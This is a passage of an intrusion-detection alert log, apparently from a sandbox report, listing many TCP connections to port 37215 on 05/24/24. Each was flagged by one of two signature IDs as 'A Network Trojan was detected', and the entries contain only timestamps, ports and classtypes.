              Timestamp:05/24/24-10:59:00.433613
              SID:2835222
              Source Port:60480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.247795
              SID:2829579
              Source Port:35608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517162
              SID:2829579
              Source Port:53606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538261
              SID:2829579
              Source Port:34104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.681060
              SID:2835222
              Source Port:45248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878067
              SID:2829579
              Source Port:55300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.383310
              SID:2835222
              Source Port:54386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.230966
              SID:2829579
              Source Port:37614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482340
              SID:2835222
              Source Port:47422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102486
              SID:2835222
              Source Port:56630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.398242
              SID:2829579
              Source Port:54784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482600
              SID:2835222
              Source Port:36704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537651
              SID:2829579
              Source Port:54830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361313
              SID:2835222
              Source Port:59190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187539
              SID:2829579
              Source Port:47430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.526872
              SID:2829579
              Source Port:47876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397916
              SID:2829579
              Source Port:38172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.928729
              SID:2835222
              Source Port:51664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878719
              SID:2835222
              Source Port:40006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447928
              SID:2835222
              Source Port:44596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878088
              SID:2835222
              Source Port:49798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.443620
              SID:2835222
              Source Port:57642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.105741
              SID:2829579
              Source Port:48446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.516468
              SID:2835222
              Source Port:48602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189523
              SID:2829579
              Source Port:45546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.420886
              SID:2829579
              Source Port:35092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449919
              SID:2829579
              Source Port:33242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.441936
              SID:2835222
              Source Port:42808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.526898
              SID:2829579
              Source Port:33788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103376
              SID:2835222
              Source Port:47834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.428273
              SID:2835222
              Source Port:56628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.604690
              SID:2829579
              Source Port:57790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.641727
              SID:2829579
              Source Port:60190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.515605
              SID:2829579
              Source Port:52598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574729
              SID:2835222
              Source Port:37780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432519
              SID:2835222
              Source Port:54400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536527
              SID:2829579
              Source Port:37082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245816
              SID:2829579
              Source Port:41480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.402203
              SID:2835222
              Source Port:49274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.491493
              SID:2829579
              Source Port:39692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.592040
              SID:2835222
              Source Port:33330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799061
              SID:2835222
              Source Port:42700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520261
              SID:2835222
              Source Port:49472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204430
              SID:2835222
              Source Port:60104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.054089
              SID:2835222
              Source Port:46308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329408
              SID:2829579
              Source Port:41672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430756
              SID:2835222
              Source Port:39230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202886
              SID:2829579
              Source Port:34368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.210032
              SID:2835222
              Source Port:33400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.287939
              SID:2835222
              Source Port:48020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425809
              SID:2829579
              Source Port:34734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.252591
              SID:2829579
              Source Port:52246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.108732
              SID:2829579
              Source Port:49448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.347046
              SID:2829579
              Source Port:50830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624880
              SID:2829579
              Source Port:45998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477848
              SID:2835222
              Source Port:49188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.124886
              SID:2829579
              Source Port:46844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.418933
              SID:2829579
              Source Port:33222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481317
              SID:2829579
              Source Port:52062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638463
              SID:2835222
              Source Port:36714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.830606
              SID:2829579
              Source Port:47672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.333871
              SID:2835222
              Source Port:50176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.695691
              SID:2829579
              Source Port:50312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637985
              SID:2835222
              Source Port:57898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.076613
              SID:2835222
              Source Port:54286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.585191
              SID:2829579
              Source Port:55610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.161274
              SID:2835222
              Source Port:36592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100716
              SID:2835222
              Source Port:60794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.107898
              SID:2835222
              Source Port:55708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.125004
              SID:2835222
              Source Port:48184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.254335
              SID:2829579
              Source Port:57850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.402772
              SID:2829579
              Source Port:51352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.750623
              SID:2829579
              Source Port:50268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856886
              SID:2835222
              Source Port:34140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.251661
              SID:2835222
              Source Port:44218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100438
              SID:2835222
              Source Port:36464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517412
              SID:2829579
              Source Port:46918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100770
              SID:2835222
              Source Port:40788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.124075
              SID:2835222
              Source Port:49824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.333958
              SID:2829579
              Source Port:47416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.242039
              SID:2835222
              Source Port:51058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116333
              SID:2829579
              Source Port:54394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.383389
              SID:2829579
              Source Port:52314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726090
              SID:2835222
              Source Port:43454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.969134
              SID:2835222
              Source Port:42748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.264714
              SID:2829579
              Source Port:55132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.444153
              SID:2835222
              Source Port:57244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.921316
              SID:2835222
              Source Port:40698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.070076
              SID:2829579
              Source Port:57398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.067978
              SID:2829579
              Source Port:48918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.884563
              SID:2835222
              Source Port:46890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860066
              SID:2835222
              Source Port:38264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358595
              SID:2835222
              Source Port:40684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111414
              SID:2829579
              Source Port:49980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100771
              SID:2829579
              Source Port:55906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.435347
              SID:2835222
              Source Port:32844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.990657
              SID:2835222
              Source Port:37374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548139
              SID:2829579
              Source Port:37834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801853
              SID:2835222
              Source Port:55544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505458
              SID:2829579
              Source Port:53236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368711
              SID:2829579
              Source Port:37070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447233
              SID:2835222
              Source Port:36178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.642073
              SID:2829579
              Source Port:37458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.775397
              SID:2835222
              Source Port:45012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553096
              SID:2835222
              Source Port:34554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.976934
              SID:2835222
              Source Port:60550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.689819
              SID:2835222
              Source Port:54378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.422350
              SID:2835222
              Source Port:53922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457796
              SID:2829579
              Source Port:39190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.554228
              SID:2829579
              Source Port:54942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341138
              SID:2835222
              Source Port:57044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484312
              SID:2835222
              Source Port:58722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.776678
              SID:2835222
              Source Port:53908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484335
              SID:2835222
              Source Port:49148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099738
              SID:2829579
              Source Port:54710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570484
              SID:2835222
              Source Port:33670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400761
              SID:2835222
              Source Port:40632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572407
              SID:2835222
              Source Port:36158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.485773
              SID:2835222
              Source Port:33980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693102
              SID:2829579
              Source Port:60066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111396
              SID:2829579
              Source Port:46706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.744763
              SID:2835222
              Source Port:45596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113432
              SID:2829579
              Source Port:39574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280929
              SID:2829579
              Source Port:48928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481126
              SID:2829579
              Source Port:38784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517431
              SID:2829579
              Source Port:52294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.396392
              SID:2829579
              Source Port:38154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.050089
              SID:2829579
              Source Port:48026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.862014
              SID:2835222
              Source Port:57320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.879403
              SID:2829579
              Source Port:36556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833850
              SID:2835222
              Source Port:44356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.063328
              SID:2829579
              Source Port:33898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300283
              SID:2829579
              Source Port:56382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.206392
              SID:2835222
              Source Port:37256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.155785
              SID:2835222
              Source Port:47310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549162
              SID:2829579
              Source Port:52914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.451064
              SID:2835222
              Source Port:49014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596497
              SID:2835222
              Source Port:40672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.868002
              SID:2829579
              Source Port:46620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.070919
              SID:2835222
              Source Port:60176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483544
              SID:2835222
              Source Port:57366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625306
              SID:2835222
              Source Port:34006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692631
              SID:2835222
              Source Port:34568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920479
              SID:2829579
              Source Port:51844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.122519
              SID:2835222
              Source Port:55410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596501
              SID:2829579
              Source Port:33790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.982420
              SID:2829579
              Source Port:43748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.210899
              SID:2835222
              Source Port:56874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446372
              SID:2835222
              Source Port:34994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372556
              SID:2835222
              Source Port:51100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551676
              SID:2829579
              Source Port:54710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.552815
              SID:2835222
              Source Port:43254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282245
              SID:2829579
              Source Port:59268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.518971
              SID:2835222
              Source Port:56096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520119
              SID:2835222
              Source Port:41794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.582014
              SID:2835222
              Source Port:35188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431656
              SID:2829579
              Source Port:52562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624129
              SID:2835222
              Source Port:47918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726585
              SID:2835222
              Source Port:52304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.796096
              SID:2835222
              Source Port:44192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099535
              SID:2835222
              Source Port:53122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308807
              SID:2835222
              Source Port:53856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.642887
              SID:2835222
              Source Port:55038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574725
              SID:2829579
              Source Port:54532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.591720
              SID:2835222
              Source Port:44496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.546117
              SID:2835222
              Source Port:35426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.063947
              SID:2829579
              Source Port:46010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763323
              SID:2829579
              Source Port:38832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.975690
              SID:2829579
              Source Port:51896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394373
              SID:2829579
              Source Port:54812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596262
              SID:2835222
              Source Port:47818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.552286
              SID:2835222
              Source Port:33352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186579
              SID:2829579
              Source Port:53136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053629
              SID:2829579
              Source Port:47728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232650
              SID:2835222
              Source Port:51940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.433297
              SID:2835222
              Source Port:59284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725481
              SID:2835222
              Source Port:34058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.403027
              SID:2829579
              Source Port:39608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102129
              SID:2835222
              Source Port:38052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640468
              SID:2835222
              Source Port:48414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535099
              SID:2829579
              Source Port:50638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477868
              SID:2835222
              Source Port:36158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478400
              SID:2829579
              Source Port:58116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097269
              SID:2829579
              Source Port:46590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.831595
              SID:2835222
              Source Port:50840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.621830
              SID:2835222
              Source Port:38680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484362
              SID:2829579
              Source Port:32986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802609
              SID:2829579
              Source Port:36312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640374
              SID:2835222
              Source Port:56042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.567248
              SID:2829579
              Source Port:44608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.268615
              SID:2829579
              Source Port:57718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279177
              SID:2835222
              Source Port:45442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.434470
              SID:2829579
              Source Port:39862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.444184
              SID:2835222
              Source Port:54940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.195272
              SID:2835222
              Source Port:43186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536816
              SID:2835222
              Source Port:54668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098684
              SID:2835222
              Source Port:34400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.486150
